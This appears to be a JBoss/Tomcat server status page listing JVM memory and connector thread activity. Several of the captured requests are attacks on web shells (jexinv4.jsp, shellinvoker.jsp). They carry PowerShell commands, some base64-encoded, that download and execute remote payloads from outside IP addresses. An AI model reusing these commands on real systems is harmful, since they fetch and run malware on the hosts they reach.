JVM

Free memory: 106.73 MB Total memory: 148.62 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

StageTimeB SentB RecvClientVHostRequest

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 22 Current thread busy: 11
Max processing time: 85781 ms Processing time: 2627.425 s Request count: 16715 Error count: 891 Bytes received: 6.20 MB Bytes sent: 176.15 MB

StageTimeB SentB RecvClientVHostRequest
S392765181 ms0 KB0 KB196.188.128.5281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell+-exec+bypass+-c+%22%28New-Object+Net.WebClient%29.Proxy.Credentials%3D%5BNet.CredentialCache%5D%3A%3ADefaultNetworkCredentials%3Biwr%28%27http%3A%2F%2F196.188.128.52%2FInstaller.exe%27%29%7Ciex%22 HTTP/1.1
S249117026 ms0 KB0 KB195.22.127.9381.45.140.46GET /shellinvoker/shellinvoker.jsp?ppp=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20cABvAHcAZQByAHMAaABlAGwAbAAgACIASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADgANwAuADEAMgAxAC4AOQA4AC4AMgAxADUAOgA4ADAAMAAwAC8AaQBuAGYAbwA2AC4AcABzADEAJwApACIA HTTP/1.1
S248265106 ms0 KB0 KB195.22.127.9381.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20cABvAHcAZQByAHMAaABlAGwAbAAgACIASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADgANwAuADEAMgAxAC4AOQA4AC4AMgAxADUAOgA4ADAAMAAwAC8AaQBuAGYAbwA2AC4AcABzADEAJwApACIA HTTP/1.1
R??????
R??????
S392752840 ms0 KB0 KB196.188.128.5281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell+-exec+bypass+-c+%22%28New-Object+Net.WebClient%29.Proxy.Credentials%3D%5BNet.CredentialCache%5D%3A%3ADefaultNetworkCredentials%3Biwr%28%27http%3A%2F%2F196.188.128.52%2FInstaller.exe%27%29%7Ciex%22 HTTP/1.1
R??????
S248254577 ms0 KB0 KB195.22.127.9381.45.140.46GET /shellinvoker/shellinvoker.jsp?ppp=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20cABvAHcAZQByAHMAaABlAGwAbAAgACIASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADgANwAuADEAMgAxAC4AOQA4AC4AMgAxADUAOgA4ADAAMAAwAC8AaQBuAGYAbwA2AC4AcABzADEAJwApACIA HTTP/1.1
S392771318 ms0 KB0 KB196.188.128.5281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell+-exec+bypass+-c+%22%28New-Object+Net.WebClient%29.Proxy.Credentials%3D%5BNet.CredentialCache%5D%3A%3ADefaultNetworkCredentials%3Biwr%28%27http%3A%2F%2F196.188.128.52%2FInstaller.exe%27%29%7Ciex%22 HTTP/1.1
S392759023 ms0 KB0 KB196.188.128.5281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell+-exec+bypass+-c+%22%28New-Object+Net.WebClient%29.Proxy.Credentials%3D%5BNet.CredentialCache%5D%3A%3ADefaultNetworkCredentials%3Biwr%28%27http%3A%2F%2F196.188.128.52%2FInstaller.exe%27%29%7Ciex%22 HTTP/1.1
S63570943 ms0 KB1 KB222.173.58.9781.45.140.46POST /jbossmanage/manage.jsp HTTP/1.1
S142584140 ms0 KB1 KB222.173.58.9681.45.140.46POST /jbossmanage/manage.jsp HTTP/1.1
R??????
R??????
R??????
R??????
S249130859 ms0 KB0 KB195.22.127.9381.45.140.46GET /jexinv4/jexinv4.jsp?ppp=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20cABvAHcAZQByAHMAaABlAGwAbAAgACIASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADgANwAuADEAMgAxAC4AOQA4AC4AMgAxADUAOgA4ADAAMAAwAC8AaQBuAGYAbwA2AC4AcABzADEAJwApACIA HTTP/1.1
R??????
R??????
S7 ms0 KB0 KB54.196.42.146catalogo.museolazarogaldiano.esGET /status HTTP/1.1
R??????
R??????

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive